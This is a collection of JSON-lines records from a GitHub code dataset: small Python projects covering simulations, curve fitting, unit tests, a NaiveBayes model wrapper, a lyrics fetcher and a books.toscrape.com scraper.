w_main.FindElement('li_values').Update(get_name_in_file(path_file()))\n\n                        # update statistics\n                        list_len, m, f, n, m_percent, f_percent, n_percent = collect_statistics()\n                        w_main.FindElement('qtd_total').Update(list_len)\n                        w_main.FindElement('qtd_men').Update(m)\n                    
w_main.FindElement('qtd_women').Update(f)\n w_main.FindElement('qtd_none').Update(n)\n w_main.FindElement('qtd_men_pct').Update(m_percent)\n w_main.FindElement('qtd_women_pct').Update(f_percent)\n w_main.FindElement('qtd_none_pct').Update(n_percent)\n\n popup_success_add_contact(values)\n w_add_contact.close()\n w_main.enable()\n w_main.bring_to_front()\n elif validation == 101:\n print('[ERRO 101] Já tem um contato com esse nome')\n popup_error_101(values)\n elif validation == 102:\n print(\"[ERRO 202] Contato não pode ser vazio\")\n popup_error_102(values)\n elif event == 'btn_return':\n w_add_contact.close()\n w_main.enable()\n w_main.bring_to_front()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gesmachado/phone_book","sub_path":"src/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35571719408","text":"import random\nimport os\nos.system('cls')\n\nlistRandom = []\n\n\ndef tambahData(data):\n print(55*'-')\n panjangData = int(input(\"Masukkan Panjang data: \"))\n for i in range(panjangData):\n listRandom.append(random.randint(-25, 100))\n return data\n\n\ndef sortTertinggi(data):\n max = data[0]\n for i in range(1, len(data)):\n if data[i] > max:\n max = data[i]\n return max\n\n\ndef sortTerendah(data):\n max = data[0]\n for i in range(1, len(data)):\n if data[i] < max:\n max = data[i]\n return max\n\n\ndataRandom = tambahData(listRandom)\nlRandomTertinggi = sortTertinggi(dataRandom)\nlRandomTerendah = sortTerendah(dataRandom)\n\nprint(55*'-')\nprint(f\"Nilai Random : {dataRandom}\")\nprint(f\"Nilai terbesar: {lRandomTertinggi}\")\nprint(f\"Nilai terkecil: {lRandomTerendah}\")\nprint(55*'-')\n","repo_name":"FanoDre/Algoritma-Pemrograman2","sub_path":"pertemuan11/max.py","file_name":"max.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32889923817","text":"\nfrom ComplexCar import ComplexCar\nimport random\nimport numpy as np\n\nclass Road:\n\n\tdef __init__(self, numRoads):\n\t\tself.EWRoad = [(0, ComplexCar(0, 0))] * (3 + numRoads)\n\t\tself.NSRoad = [(0, ComplexCar(0,0))] * (3 + numRoads)\n\t\tself.done = False\n\t\tself.totalReward = 0\n\t\tself.carPositions = []\n\t\tself.numRoads = numRoads\n\t\tself.numCars = 0\n\n\tdef numCars(self):\n\t\treturn self.numCars\n\n\tdef putCar(self, road, pos, car):\n\t\tif road == 1:\n\t\t\tself.EWRoad[pos] = (1, car)\n\t\telse:\n\t\t\tself.NSRoad[pos] = (1, car)\n\n\tdef binaryRepresentation(self):\n\t\ttemp = np.array([bit[0] for bit in self.EWRoad])\n\t\ttemp2 = np.array([bit[0] for bit in self.NSRoad])\n\t\treturn np.array([temp, temp2])\n\n\n\tdef newInstance(self):\n\t\tself.EWRoad = [(0, ComplexCar(0,0))] * (3+ self.numRoads)\n\t\tself.NSRoad = [(0, ComplexCar(0,0))] * (3 + self.numRoads)\n\t\tself.done = False\n\n\n\tdef gameEnd(self):\n\t\treturn self.done\n\n\n\tdef getState(self):\n\t\tbinary = self.binaryRepresentation()\n\t\twait = []\n\t\tspeed = []\n\t\tfor i in range(self.numRoads + 3):\n\t\t\twait.append(self.EWRoad[i][1].wait_time)\n\t\t\tspeed.append(self.EWRoad[i][1].speed)\n\t\tfor i in range(self.numRoads + 3):\n\t\t\twait.append(self.NSRoad[i][1].wait_time)\n\t\t\tspeed.append(self.NSRoad[i][1].speed)\n\n\t\treturn np.array([binary, np.array(wait), np.array(speed)])\n\n\n\tdef crash(self):\n\t\tself.EWRoad = [(-1, ComplexCar(0,0))] * (3 + self.numRoads)\n\t\tself.NSRoad = 
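The max.py exercise just above reimplements the largest/smallest scan with index arithmetic. In working code Python's built-ins already cover this, and iterating values directly reads better than the range(len(...)) pattern; a short sketch:

```python
import random

data = [random.randint(-25, 100) for _ in range(10)]

highest = max(data)   # replaces sortTertinggi
lowest = min(data)    # replaces sortTerendah

# Equivalent hand-rolled loop, iterating values instead of indices:
best = data[0]
for value in data[1:]:
    if value > best:
        best = value
assert best == highest
```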
[(-1, ComplexCar(0,0))] * (3 + self.numRoads)\n\n\tdef updateStep(self, stepNum):\n\t\tfor i in range(self.numRoads + 3):\n\t\t\tif(self.EWRoad[i][1].speed >= stepNum and self.EWRoad[i][0] == 1):\n\t\t\t\tcars = self.EWRoad[i - 1][0] + 1\n\t\t\t\tif(cars == 2):\n\t\t\t\t\treturn 0\n\t\t\t\tspeed = self.EWRoad[i][1].speed\n\t\t\t\twait_time = self.EWRoad[i][1].wait_time\n\t\t\t\tself.EWRoad[i - 1] = (cars, ComplexCar(wait_time, speed))\n\t\t\t\tself.EWRoad[i] = (0, ComplexCar(0,0))\n\t\tfor i in range(self.numRoads + 3):\n\t\t\tif(self.NSRoad[i][1].speed >= stepNum and self.NSRoad[i][0] == 1):\n\t\t\t\tcars = self.NSRoad[i - 1][0] + 1\n\t\t\t\tif(cars == 2):\n\t\t\t\t\treturn 0\n\t\t\t\tspeed = self.NSRoad[i][1].speed\n\t\t\t\twait_time = self.NSRoad[i][1].wait_time\n\t\t\t\tself.NSRoad[i - 1] = (cars, ComplexCar(wait_time, speed))\n\t\t\t\tself.NSRoad[i] = (0, ComplexCar(0,0))\n\t\tif(self.EWRoad[1][0] == 1) and (self.NSRoad[1][0] == 1):\n\t\t\treturn 0\n\t\treturn 1\n\n\n\tdef step(self, pos, action):\n\t\tself.EWRoad[pos][1].drive(action)\n\t\treward = 0\n\t\twait = self.EWRoad[pos][1].wait_time\n\t\treward += (-2 + -2 * wait)\n\t\toutput = []\n\t\tchance = random.random()\n\t\t#list - 1\n\t\tfinishCar = self.EWRoad.pop(0)\n\t\tfinishCarNS = self.NSRoad.pop(0)\n\t\tself.EWRoad.insert(0, (0,ComplexCar(0,0)))\n\t\tself.NSRoad.insert(0, (0,ComplexCar(0,0)))\n\t\tif(finishCar[0] == 1):\n\t\t\tdone = True\n\t\t\treward += 40\n\t\tupdate = self.updateStep(1)\n\t\tif(update == 0):\n\t\t\tself.crash()\n\t\t\tself.done = True\n\t\t\tself.totalReward = -100\n\t\t\treturn reward\n\n\t\tfinishCar2 = self.EWRoad.pop(0)\n\t\tfinishCarNS2 = self.NSRoad.pop(0)\n\t\tself.EWRoad.insert(0, (0, ComplexCar(0,0)))\n\t\tself.NSRoad.insert(0, (0,ComplexCar(0,0)))\n\t\tif(finishCar2[0] == 1):\n\t\t\tdone = True\n\t\t\treward += 40\n\t\tupdate = self.updateStep(2)\n\t\tif(update == 0):\n\t\t\tself.crash()\n\t\t\tself.done = True\n\t\t\tself.totalReward = -100\n\t\t\treturn reward\n\n\t\tif(self.EWRoad[1][0] == 1) and (self.NSRoad[1][0] == 1):\n\t\t\tself.crash()\n\t\t\tself.done = True\n\t\t\tself.totalReward = -100\n\t\t\treturn reward\n\n\t\t'''if self.sections[len(self.sections) - 1][0] == 0:\n\t\t\tif (chance <= self.prob):\n\t\t\t\tself.sections[len(self.sections) - 1] = (1, ComplexCar(0,2))\n\t\t\t\tself.numCars += 1'''\n\t\tself.totalReward += reward\n\t\treturn reward\n\n\n\n\n\t\n \n\n","repo_name":"ataozhou/Traffic_Controller","sub_path":"IntersectionSpeed/TestingRoad.py","file_name":"TestingRoad.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15260035128","text":"# Simulation mechanoreceptor grid and receptive fields of afferents\r\n# ADEL PARVIZI-FARD\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport random\r\nfrom IPython import get_ipython\r\nfrom scipy.signal import find_peaks\r\nget_ipython().run_line_magic('matplotlib', 'qt')\r\n\r\n# %%\r\n# (Parameters) #####################\r\n\r\nn = 5 # patch of skin dimension\r\nm = 5\r\nun_in = []\r\n\r\nrrr = [1, 3, 7, 9] # on average innervated taxels\r\nnnn = [1, 3, 5, 9]\r\nrrr = [3]\r\nnnn = [3]\r\n\r\nfor rr, nn in zip(rrr, nnn):\r\n N_MR = rr\r\n #\r\n R = nn\r\n #\r\n N = 18\r\n\r\n # create receptive field for afferents ######################################\r\n\r\n RF = np.zeros((n, m, N))\r\n random.seed(6227)\r\n np.random.seed(144457)\r\n\r\n index1 = 
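A note on getState in the Road class above: it wraps three differently shaped arrays in one np.array call — binary is (2, numRoads + 3) while the wait and speed lists are flat — which produces a ragged object array that recent NumPy versions reject outright. If the goal is a single state vector for a learner, concatenating flattened pieces is the safer shape. A sketch against the Road attributes shown above (the helper name is mine):

```python
import numpy as np

def get_state_vector(road):
    """Flatten a Road's occupancy, wait times, and speeds into one 1-D array.

    EWRoad/NSRoad hold (occupancy, ComplexCar) pairs, so the per-cell wait
    and speed values line up with the binary occupancy grid cell for cell.
    """
    binary = road.binaryRepresentation().ravel()
    wait = [cell[1].wait_time for cell in road.EWRoad + road.NSRoad]
    speed = [cell[1].speed for cell in road.EWRoad + road.NSRoad]
    return np.concatenate([binary, wait, speed]).astype(np.float32)
```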
np.arange(N)\r\n random.shuffle(index1)\r\n random.shuffle(index1)\r\n\r\n print(index1)\r\n center = []\r\n jiter = 1\r\n space = 1\r\n for j in range(5):\r\n for t1 in range(4):\r\n center.append([t1 * space + n / 5] + [j * space + m / 5])\r\n x0_y0_SA = np.array(center)\r\n\r\n RR = 5\r\n for i in range(N):\r\n x1 = np.random.normal(int(x0_y0_SA[i, 0]), R / RR, N_MR)\r\n y = np.random.normal(int(x0_y0_SA[i, 1]), R / RR, N_MR)\r\n x1 = x1.astype(int)\r\n y = y.astype(int)\r\n iii = np.where((x1 < 0))\r\n x1[iii] = 0\r\n iii = np.where((x1 > m - 1))\r\n x1[iii] = m - 1\r\n iii = np.where((y < 0))\r\n y[iii] = 0\r\n iii = np.where((y > n - 1))\r\n y[iii] = n - 1\r\n for j in range(len(x1)):\r\n RF[y[j], x1[j], index1[i]] = random.uniform(0.1, 0.8)\r\n\r\n random.seed(42123)\r\n numbers = np.arange(N)\r\n\r\n SA_index = numbers[0:int(1 * N / 3)]\r\n RA_index = numbers[int(1 * N / 3):N]\r\n RF_1 = np.zeros((n, m))\r\n\r\n#%% plot individual receptive field of each afferent\r\n for j in range(N):\r\n plt.subplot(4, 5, j + 1)\r\n RF_1 += RF[:, :, j]\r\n plt.imshow(RF[:, :, j], extent=([0, n, 0, m]), vmin=0, vmax=1)\r\n plt.title('#{}'.format(j + 1))\r\nplt.figure(2)\r\nplt.imshow(RF_1, extent=([0, n, 0, m]),vmin=0,vmax=max(RF_1.ravel()))\r\nplt.show()\r\n\r\n# %% convert Receptive fields to text file for interface board\r\nf = open(\"RF_Arduino_6.txt\", \"w\")\r\nfor j in range(N):\r\n f.write('float RF{0}[25]={{{1}}};\\n'.format(j + 1, str(list(np.array(RF[:, :, j]).flatten()))[1:-1]))\r\nf.close()","repo_name":"Research-lab-KUMS/Sharpness-Recognition","sub_path":"RF_Creation.py","file_name":"RF_Creation.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8494999861","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import crystalball\nimport uproot\nimport numpy as np\nimport math\n\ninput_file = uproot.open(\"trkana.Triggered.root\")\ninput_tree = input_file[\"TrkAnaNeg/trkana\"]\ndf = input_tree.pandas.df(flatten = False)\n\nfile2 = uproot.open(\"reco-Delta40-trig.root\")\nRPCReco2 = file2[\"TrkAnaNeg/trkana\"]\ndf2 = RPCReco2.pandas.df(flatten=False)\n\ndframes = [df, df2]\n\n\n\nresult = pd.concat(dframes)\n\n\ndef function1(x, alpha, n, mu, sigma):\n expArg = -0.5 * pow(abs(alpha), 2.)\n gauss = math.exp(expArg)\n\n A = pow((n / abs(alpha)), n) * gauss\n B = (n / abs(alpha)) - abs(alpha)\n C = n / ((abs(alpha) * (n - 1.))) * gauss\n D = math.sqrt(math.pi / 2.) * (1. + math.erf((abs(alpha) / math.sqrt(2.))))\n N = 1. / (sigma * (C + D))\n\n return (N * math.exp(-1 * (pow((x - mu), 2) / (2 * pow(sigma, 2)))))\n\n\n\ndef function2(x, alpha, n, mu, sigma):\n expArg = -0.5 * pow(abs(alpha), 2.)\n gauss = math.exp(expArg)\n\n A = pow((n / abs(alpha)), n) * gauss\n B = (n / abs(alpha)) - abs(alpha)\n C = n / ((abs(alpha) * (n - 1.))) * gauss\n D = math.sqrt(math.pi / 2.) * (1. + math.erf((abs(alpha) / math.sqrt(2.))))\n N = 1. 
/ (sigma * (C + D))\n\n return (N * A * pow((B - (x - mu) / sigma), -n))\n\n\ndef piecewise(x, alpha, n, mu, sigma):\n return np.piecewise(x,[(x - mu) / sigma > -alpha,(x - mu) / sigma >= -alpha ],[function1(x, alpha, n, mu, sigma), function2(x, alpha, n, mu, sigma)])\n\n\n\n\ndata1 = df[\"deent.mom\"]\ndata = result[\"deent.mom\"]\n\ny, bins = np.histogram(data1, bins=200);\n\n# Convert histogram into a classical plot\ndx = bins[1]-bins[0]\nx = np.linspace(bins[0]+dx/2, bins[-1]-dx/2, 200)\n\npar1 = [5,2,48,5]\n#par1 = [alpha, n, mu, sigma, scale]\n\n#par1 = [5,2,48,5,85000]\n\n\n\n\n\nplt.hist(data1, bins=100, label='data')\npopt,pcov = curve_fit(piecewise, x,y, p0 = [*par1])\nplt.plot(x, piecewise(x,*par1), )\nplt.plot(x, piecewise(x,*popt), ':r')\nplt.show()\n","repo_name":"josephinetsai/Mu2e","sub_path":"piecewise.py","file_name":"piecewise.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70514754084","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 20 12:28:56 2018\n\n@author: libertyaskew\n\"\"\"\n'''\nimport numpy as np\n\ndef discUnifSamp(n,N):\n probN = [float(i)/(N) for i in range(N)]\n sampU = [random.random() for i in range(n)]\n isGreater = [sum([bbL:\n k = k+1\n p = p*random.random()\n return k-1\n\nprint (poissonSamp_exp1(0.8))\n\ndef poissonSamp_exp(n , lam):\n return [ poissonSamp_exp1(lam) for i in range (n)]\n\nprint (poissonSamp_exp(6 , 2))","repo_name":"liberty-askew/MainProjects","sub_path":"MonteCarlo/PoissonDist.py","file_name":"PoissonDist.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3407591160","text":"import os\n\nfrom django.core.management import call_command\nfrom django.test import TestCase\n\nfrom ..models import ScriptVersion\n\nfrom . import config\nfrom . 
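A note on the Crystal Ball fit above: np.piecewise expects callables in its function list, but that script passes function1(x, ...) and function2(x, ...) already evaluated — and function1 ends up calling math.exp on the whole numpy array, which raises a TypeError before any branch is selected. The two conditions also overlap (the second should test <= -alpha for the power-law tail). Since scipy.stats.crystalball is already imported there, fitting its pdf directly sidesteps all of this. A self-contained sketch with synthetic data; scipy's beta and m parameters play the role of that file's alpha and n:

```python
import numpy as np
from scipy.optimize import curve_fit
from scipy.stats import crystalball

def cb_pdf(x, beta, m, mu, sigma, scale):
    # Crystal Ball density with a free normalisation for histogram counts.
    return scale * crystalball.pdf(x, beta, m, loc=mu, scale=sigma)

# Synthetic stand-in for the momentum histogram built in that script.
sample = crystalball.rvs(2.0, 3.0, loc=48, scale=5, size=5000, random_state=0)
y, bins = np.histogram(sample, bins=100)
x = 0.5 * (bins[:-1] + bins[1:])  # bin centres, as in the script

popt, pcov = curve_fit(cb_pdf, x, y, p0=[2, 3, 48, 5, y.max()])
```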
import mixins\n\n\nclass CommandTests(mixins.ScriptFactoryMixin, TestCase):\n def setUp(self):\n # don't setup scripts, but we want to still tear down after each test\n pass\n\n def test_addscript(self):\n call_command(\n \"addscript\", os.path.join(config.WOOEY_TEST_SCRIPTS, \"translate.py\")\n )\n # Test we can update the script\n script_version = ScriptVersion.objects.latest(\"created_date\")\n old_parameters = list(script_version.get_parameters())\n call_command(\n \"addscript\",\n \"--name\",\n \"translate\",\n os.path.join(config.WOOEY_TEST_SCRIPTS, \"translate2.py\"),\n )\n new_version = ScriptVersion.objects.latest(\"created_date\")\n\n # make sure we updated\n self.assertEqual(\n new_version.script_iteration, script_version.script_iteration + 1\n )\n\n # Make sure the parameters have not changed\n self.assertListEqual(old_parameters, list(new_version.get_parameters()))\n\n # Make sure we don't duplicate\n call_command(\n \"addscript\",\n \"--name\",\n \"translate\",\n os.path.join(config.WOOEY_TEST_SCRIPTS, \"translate2.py\"),\n )\n newest_version = ScriptVersion.objects.latest(\"created_date\")\n self.assertEqual(new_version.pk, newest_version.pk)\n","repo_name":"wooey/Wooey","sub_path":"wooey/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2006,"dataset":"github-code","pt":"52"} +{"seq_id":"40377514701","text":"import unittest\nfrom tp1 import Stuff\n\nclass TestInitIsEmpty(unittest.TestCase):\n\tdef test_init_is_empty(self):\n\t\tstuff = Stuff()\n\t\tself.assertEqual([], stuff.refs())\n\nclass TestAddRefs(unittest.TestCase):\n\tdef test_add_one_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tself.assertEqual([123], stuff.refs())\n\n\tdef test_add_multiple_refs(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.add_ref(456)\n\t\tself.assertTrue(123 in stuff.refs())\n\t\tself.assertTrue((456 in stuff.refs()))\n\n\tdef test_cant_add_existing_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\twith self.assertRaises(ValueError) :\n\t\t\tstuff.add_ref(123)\n\nclass TestDeleteRefs(unittest.TestCase):\n\tdef test_delete_existing_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.del_ref(123)\n\t\tself.assertEqual([], stuff.refs())\n\n\tdef test_cant_delete_not_existing_ref(self):\n\t\tstuff = Stuff()\n\t\twith self.assertRaises(ValueError):\n\t\t\tstuff.del_ref(123)\n\n\tdef test_cant_delete_ref_with_item(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.add_item_ref(123, 15)\n\t\twith self.assertRaises(ValueError):\n\t\t\tstuff.del_ref(123)\n\nclass TestAddItems(unittest.TestCase):\n\tdef test_add_items(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.add_item_ref(123, 15)\n\t\tstuff.add_item_ref(123, 15)\n\t\tself.assertEqual(30, stuff.items_ref(123))\n\n\tdef test_cant_add_item_in_unexisting_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\twith self.assertRaises(ValueError):\n\t\t\tstuff.add_item_ref(456, 15)","repo_name":"ig1na/SVL-M1","sub_path":"TP1/test_stuff.py","file_name":"test_stuff.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8925545031","text":"# coding: utf-8\n\nimport pickle\n\nfrom nltk.classify.naivebayes import NaiveBayesClassifier\n\n\nclass ClassifierModel():\n \"\"\"\n Modelo de Classificador NaiveBayes\n\n Attributes\n -----\n classifier: 
NaiveBayesClassifier\n uniqueWords: list [string]\n \"\"\"\n \n classifier: NaiveBayesClassifier = None\n uniqueWords: list = []\n\n def __init__(self):\n \"\"\"\n Construtor do Modelo: Verifica os modelos salvos e o carrega se existir.\n \"\"\"\n\n self.getModelSaved()\n \n def getModelSaved(self):\n \"\"\"\n Carregar Modelo Salvo anteriormente se existir\n \"\"\"\n\n try:\n f = open('classifier/export/impartiality_discovery_unique_words.pickle', 'rb')\n self.uniqueWords = pickle.load(f)\n f.close()\n\n f = open('classifier/export/impartiality_discovery_classifier.pickle', 'rb')\n self.classifier = pickle.load(f)\n f.close()\n \n except:\n print('classifier/impartiality_discovery pickle files not found')\n \n def saveModel(self):\n \"\"\"\n Salvar Progresso do Modelo em arquivo pickle\n \"\"\"\n\n f = open('classifier/export/impartiality_discovery_unique_words.pickle', 'wb')\n pickle.dump(list(self.uniqueWords), f)\n f.close()\n\n f = open('classifier/export/impartiality_discovery_classifier.pickle', 'wb')\n pickle.dump(self.classifier, f)\n f.close()\n ","repo_name":"JosueSantos/impartiality_discovery","sub_path":"classifier/ClassifierModel.py","file_name":"ClassifierModel.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1631983940","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport io\nimport subprocess as sp\nimport re\nimport os\nfrom sys import platform\nimport spotilib\n\n\ndef got_lyrics():\n\tif os.path.exists('lyrics.txt') and os.stat('lyrics.txt').st_size > 30:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef from_plyrics(artist, song):\n\tartist = re.sub('[^a-z]+', '', artist)\n\tsong = re.sub('[^a-z]+', '', song)\n\turl = 'http://www.plyrics.com/lyrics/' + artist + '/' + song + '.html'\n\tprint(\"Fetching the lyrics from \" + url)\n\tr = requests.get(url)\n\tr.encoding = 'utf-8'\n\trt = r.text\n\tlyrics = rt[rt.find(''):rt.find('')][26:]\n\tsoup = BeautifulSoup(lyrics, \"lxml\")\n\ttext = soup.get_text()\n\twith io.open('lyrics.txt', 'w', encoding='utf-8') as f:\n\t\tf.write(text)\n\n\ndef from_tekstowo(artist, song):\n\tartist = artist.replace(\" \", \"_\")\n\tartist = re.sub('[^a-z_]+', '', artist)\n\tsong = song.replace(\" \", \"_\")\n\tsong = re.sub('[^a-z_]+', '', song)\n\turl = 'http://www.tekstowo.pl/piosenka,' + artist + ',' + song + '.html'\n\tprint(\"Fetching the lyrics from \" + url)\n\tr = requests.get(url)\n\tr.encoding = 'utf-8'\n\trt = r.text\n\tlyrics = rt[rt.find('Tekst piosenki:'):rt.find('Poznaj histori')][50:]\n\tsoup = BeautifulSoup(lyrics, \"lxml\")\n\ttext = soup.get_text()\n\twith io.open('lyrics.txt', 'w', encoding='utf-8') as f:\n\t\tf.write(text)\n\n\ndef get_new_lyrics(artist, song, proc):\n\tfrom_plyrics(artist, song)\n\tif not got_lyrics():\n\t\tfrom_tekstowo(artist, song)\n\t\tif not got_lyrics():\n\t\t\tif os.path.exists('lyrics.txt'):\n\t\t\t\tos.remove('lyrics.txt')\n\t\t\tprint(\"Lyrics unavailable\")\n\tif proc is not None:\n\t\tproc.kill()\n\tif os.path.exists('lyrics.txt'):\n\t\tprint(\"Fetched successfully\")\n\t\tif platform.startswith('linux'):\n\t\t\tproc = sp.Popen([\"gedit\", \"lyrics.txt\"])\n\t\telif platform.startswith('win'):\n\t\t\tproc = sp.Popen([\"notepad.exe\", \"lyrics.txt\"])\n\treturn artist, song, proc\n\nac, sc = ('',)*2\npc = None\nif os.path.exists('lyrics.txt'):\n\tos.remove('lyrics.txt')\n\nwhile True:\n\ta = spotilib.artist().lower()\n\ta = a.replace(\"é\", \"e\")\n\tif a[:3] == 
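The ClassifierModel above pairs bare open/close calls with a blanket except that swallows every failure, not just a missing file. with-blocks plus catching only FileNotFoundError keep the first-run case quiet while letting genuine errors (corrupt pickle, bad permissions) surface. A sketch of the two methods as they might sit on the class, using the same paths:

```python
import pickle

UNIQUE_WORDS_PATH = 'classifier/export/impartiality_discovery_unique_words.pickle'
CLASSIFIER_PATH = 'classifier/export/impartiality_discovery_classifier.pickle'

def getModelSaved(self):
    try:
        with open(UNIQUE_WORDS_PATH, 'rb') as f:
            self.uniqueWords = pickle.load(f)
        with open(CLASSIFIER_PATH, 'rb') as f:
            self.classifier = pickle.load(f)
    except FileNotFoundError:
        # First run: nothing trained yet, keep the empty defaults.
        print('classifier/impartiality_discovery pickle files not found')

def saveModel(self):
    with open(UNIQUE_WORDS_PATH, 'wb') as f:
        pickle.dump(list(self.uniqueWords), f)
    with open(CLASSIFIER_PATH, 'wb') as f:
        pickle.dump(self.classifier, f)
```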
\"the\":\n\t\ta = a[3:]\n\ts = spotilib.song().lower()\n\tif a != ac or s != sc:\n\t\tprint(spotilib.song_info())\n\t\tac, sc, pc = get_new_lyrics(a, s, pc)\n\t\tprint()\n\ttime.sleep(1)\n","repo_name":"Existanza/spot","sub_path":"spot.py","file_name":"spot.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30287429520","text":"from ast import Num\nimport csv\nfrom unicodedata import category\nimport urllib.request as urllib2\nfrom bs4 import BeautifulSoup\nimport os\n\n# Parameter of the function:\n# - url = url of the image (str).\n# - name = title of the book.\n\ndef download_image(url,name):\n # remove all the character except num and letter\n s = ''.join(ch for ch in name if ch.isalnum())+'.jpg';\n \n # Create a directory image\n if not os.path.exists('image'):\n os.makedirs('image');\n \n # Save the image in the directory image \n urllib2.urlretrieve(url,'image/'+s);s\n #print('Image Dowloaded succesfully');\n\n\ndef bookDataRetrieve(quote_page,root_url):\n \n page = urllib2.urlopen(quote_page);\n soup = BeautifulSoup(page, 'html.parser');\n\n #retrieve path of the picture\n img_link = soup.find('img')['src'];\n img_link = img_link[6:];\n img_link = root_url + img_link;\n # Keep only the digit for the stock available.\n availableTxt = soup.findAll('td')[5].get_text();\n stock = [];\n for s in availableTxt.split('('):\n for t in s:\n if(t.isdigit()== True):\n stock.append(t)\n \n #Dictionnary where we stock all the data needed for a book.\n book_data = {\n 'product_page': quote_page,\n 'universal_product_code': soup.findAll('td')[0].get_text(),\n 'title': soup.find('h1').get_text(),\n 'price_including_tax': soup.findAll('td')[2].get_text(),\n 'price_excluding_tax': soup.findAll('td')[3].get_text(),\n 'number_available':\"\".join(stock),\n 'product_description':soup.findAll(\"p\")[3].get_text(),\n 'category':soup.findAll('a')[3].get_text(),\n 'review_rating':soup.findAll('td')[6].get_text(),\n 'image_url':img_link,\n }\n\n download_image(img_link,book_data['title']);\n \n \n \n print('All the data from '+ book_data['title'] + ' have been retrieved.')\n return book_data;\n \ndef categoryDataRetreiver(quote_page,root_url,quote_page_cat_root):\n page = urllib2.urlopen(quote_page);\n soup = BeautifulSoup(page, 'html.parser');\n page_num = soup.find_all('a')[-1].get_text();\n \n url_book_list = [];\n category_book_data = [];\n temp_cat_list = [];\n\n\n for x in soup.find_all('div', class_='image_container'):\n url = x.find('a')['href'][9:];\n url = root_url +'catalogue/'+ url;\n category_book_data.append(bookDataRetrieve(url,root_url));\n url_book_list.append(url);\n \n if(page_num == 'previous'):\n return category_book_data;\n \n if(page_num == 'next'):\n temp_quote = quote_page_cat_root + soup.find_all('a')[-1]['href'];\n temp_cat_list = categoryDataRetreiver(temp_quote,root_url,quote_page_cat_root);\n category_book_data.extend(temp_cat_list);\n return category_book_data;\n\ndef URLcategoryfunction(soup):\n url_cat_list = [];\n root_url_cat_list = [];\n cat_txt =[];\n\n for x in soup.find('ul', class_='nav nav-list').find_all('li'):\n url_temp1 = x.find('a')['href'];\n cat_txt.append(x.get_text())\n url_cat_list.append(url_temp1);\n url_temp2 = url_temp1.replace('index.html','');\n root_url_cat_list.append(url_temp2)\n\n del url_cat_list[0]\n del root_url_cat_list[0]\n del cat_txt[0]\n return url_cat_list,root_url_cat_list,cat_txt;\n\n####### Script ##########\n\nroot_url = 
'http://books.toscrape.com/';\n#quote_page = 'http://books.toscrape.com/catalogue/full-moon-over-noahs-ark-an-odyssey-to-mount-ararat-and-beyond_811/index.html';\n#quote_page2 = 'http://books.toscrape.com/catalogue/category/books/travel_2/index.html';\n#quote_page_cat_root = 'http://books.toscrape.com/catalogue/category/books/travel_2/';\n\npage = urllib2.urlopen(root_url);\nsoup = BeautifulSoup(page, 'html.parser');\n\nurl_cat_list, root_url_cat_list, cat_txt = URLcategoryfunction(soup);\nif not os.path.exists('book'):\n os.makedirs('book');\n\nfor x in url_cat_list:\n print('Currently working in the following link : ',root_url + x)\n csv_header = ['product_page','universal_product_code',\n 'title','price_including_tax','price_excluding_tax',\n 'number_available','product_description',\n 'category','review_rating','image_url'];\n cat_name = cat_txt[url_cat_list.index(x)].replace('\\n','').replace(' ',\"\");\n \n with open('./book/'+ cat_name +'.csv', 'w',encoding=\"utf-8\", newline='') as csvfile:\n dict_writer = csv.DictWriter(csvfile,fieldnames=csv_header, dialect = csv.excel) \n dict_writer.writeheader() \n \n page_book_list = categoryDataRetreiver(root_url + x,root_url,root_url + root_url_cat_list[url_cat_list.index(x)]);\n print('There are '+ str(len(page_book_list))+' books in the '+ cat_name +' category')\n for x in range(len(page_book_list)):\n dict_writer.writerow(page_book_list[x])","repo_name":"MehdiTmz/OPR_Project_1","sub_path":"webScrapeTest.py","file_name":"webScrapeTest.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25131463481","text":"from _Framework.ModeSelectorComponent import ModeSelectorComponent \nfrom _Framework.ButtonElement import ButtonElement \nfrom _Framework.MixerComponent import MixerComponent \nfrom _Framework.ButtonMatrixElement import ButtonMatrixElement\nfrom 